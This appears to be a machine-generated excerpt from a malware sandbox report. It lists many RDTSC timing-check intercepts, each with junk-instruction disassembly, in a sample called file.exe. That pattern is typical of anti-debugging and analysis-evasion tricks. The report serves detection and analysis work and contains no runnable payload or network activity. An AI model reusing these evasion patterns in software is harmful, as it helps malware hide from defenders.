Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E01DA second address: 7E01DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E0371 second address: 7E0377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E0C4F second address: 7E0C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F292CD152E6h 0x0000000a popad 0x0000000b pushad 0x0000000c jl 00007F292CD152E6h 0x00000012 jmp 00007F292CD152F5h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E0C78 second address: 7E0C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 push ebx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E3FE8 second address: 7E401C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152EFh 0x00000007 jmp 00007F292CD152F4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jnp 00007F292CD152E6h 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F3C2C second address: 7F3C31 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F3C31 second address: 7F3C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F3C3A second address: 7F3C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F3C40 second address: 7F3C4D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F3C4D second address: 7F3C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F3C53 second address: 7F3C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F3DC5 second address: 7F3DDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F292CD65AB3h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F3DDF second address: 7F3DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F8FD3 second address: 7F8FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F8FD7 second address: 7F8FF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F917A second address: 7F917E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F917E second address: 7F9184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F9184 second address: 7F918B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F918B second address: 7F9191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F9191 second address: 7F91A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007F292CD65AB2h 0x0000000d jnc 00007F292CD65AA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F930C second address: 7F9311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F9461 second address: 7F9465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F9465 second address: 7F9469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F9469 second address: 7F9485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F292CD65AA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F292CD65AACh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F9485 second address: 7F9489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F9489 second address: 7F948F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F948F second address: 7F94AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F292CD152E6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f jp 00007F292CD152E6h 0x00000015 popad 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4999 second address: 7A499D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A499D second address: 7A49A7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F292CD152E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FF246 second address: 7FF24C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FF24C second address: 7FF255 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FF255 second address: 7FF261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FF261 second address: 7FF265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FE4FC second address: 7FE505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805179 second address: 805184 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805DB9 second address: 805DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80AF16 second address: 80AF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F292CD152EFh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80B1F1 second address: 80B1FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80B1FF second address: 80B205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80B205 second address: 80B20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80B20B second address: 80B20F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80B354 second address: 80B35A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80B8FA second address: 80B90D instructions: 0x00000000 rdtsc 0x00000002 je 00007F292CD152E6h 0x00000008 jg 00007F292CD152E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80B90D second address: 80B913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80B913 second address: 80B919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8181A0 second address: 8181A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8181A6 second address: 8181C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F292CD152F9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8182F7 second address: 818302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81862B second address: 818631 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818956 second address: 81896E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F292CD65AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F292CD65AAEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81896E second address: 818984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F292CD152F1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818984 second address: 81899E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F292CD65AA6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jp 00007F292CD65AC5h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818B19 second address: 818B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F292CD152F1h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F292CD152F1h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818E32 second address: 818E51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818E51 second address: 818E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 817D22 second address: 817D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 817D26 second address: 817D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F292CD152F0h 0x00000012 jmp 00007F292CD152F1h 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82212E second address: 822138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 822138 second address: 82213E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82213E second address: 82214B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D2D8 second address: 82D2ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F292CD152EFh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D2ED second address: 82D2F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830411 second address: 830415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830415 second address: 83042B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F292CD65AA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d pushad 0x0000000e push esi 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83042B second address: 830435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F292CD152E6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830435 second address: 830449 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848509 second address: 848515 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F292CD152E6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848515 second address: 848520 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007F292CD65AA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848520 second address: 84854D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F292CD152F8h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F292CD15316h 0x00000012 jbe 00007F292CD15302h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846CD5 second address: 846CF2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F292CD65AA6h 0x00000008 jmp 00007F292CD65AAEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846E7E second address: 846E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846E86 second address: 846E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846E8C second address: 846E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84703A second address: 84705F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jns 00007F292CD65AA6h 0x0000000e jl 00007F292CD65AA6h 0x00000014 popad 0x00000015 pop esi 0x00000016 pushad 0x00000017 ja 00007F292CD65AB2h 0x0000001d jno 00007F292CD65AA6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84705F second address: 847091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F292CD152EAh 0x0000000a jnp 00007F292CD15300h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F292CD152F8h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847091 second address: 847097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847097 second address: 84709B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8474F7 second address: 84751F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F292CD65AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F292CD65AAEh 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F292CD65AADh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84751F second address: 847526 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84826E second address: 848274 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848274 second address: 84827A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84827A second address: 84827E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84C047 second address: 84C04D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84C04D second address: 84C051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84C051 second address: 84C06C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84C06C second address: 84C080 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AB0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84C080 second address: 84C086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84C086 second address: 84C0A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AABh 0x00000007 pushad 0x00000008 jmp 00007F292CD65AB3h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84C0A9 second address: 84C0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8569CD second address: 856A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007F292CD65AA6h 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 jp 00007F292CD65AA6h 0x00000017 pop edi 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b je 00007F292CD65AA6h 0x00000021 jmp 00007F292CD65AB9h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856A09 second address: 856A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856A0E second address: 856A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F292CD65AA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8670CB second address: 8670DC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F292CD152E6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8670DC second address: 867128 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F292CD65AA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F292CD65ACEh 0x00000012 jmp 00007F292CD65AAFh 0x00000017 jmp 00007F292CD65AB9h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F292CD65AB0h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 867128 second address: 86712C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 866F16 second address: 866F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 866F23 second address: 866F2D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F292CD152E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 866F2D second address: 866F6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AAAh 0x00000007 jmp 00007F292CD65AB7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F292CD65AA6h 0x00000017 jmp 00007F292CD65AB1h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869D90 second address: 869DA1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F292CD152E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869DA1 second address: 869DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86995A second address: 86995E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86995E second address: 869966 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
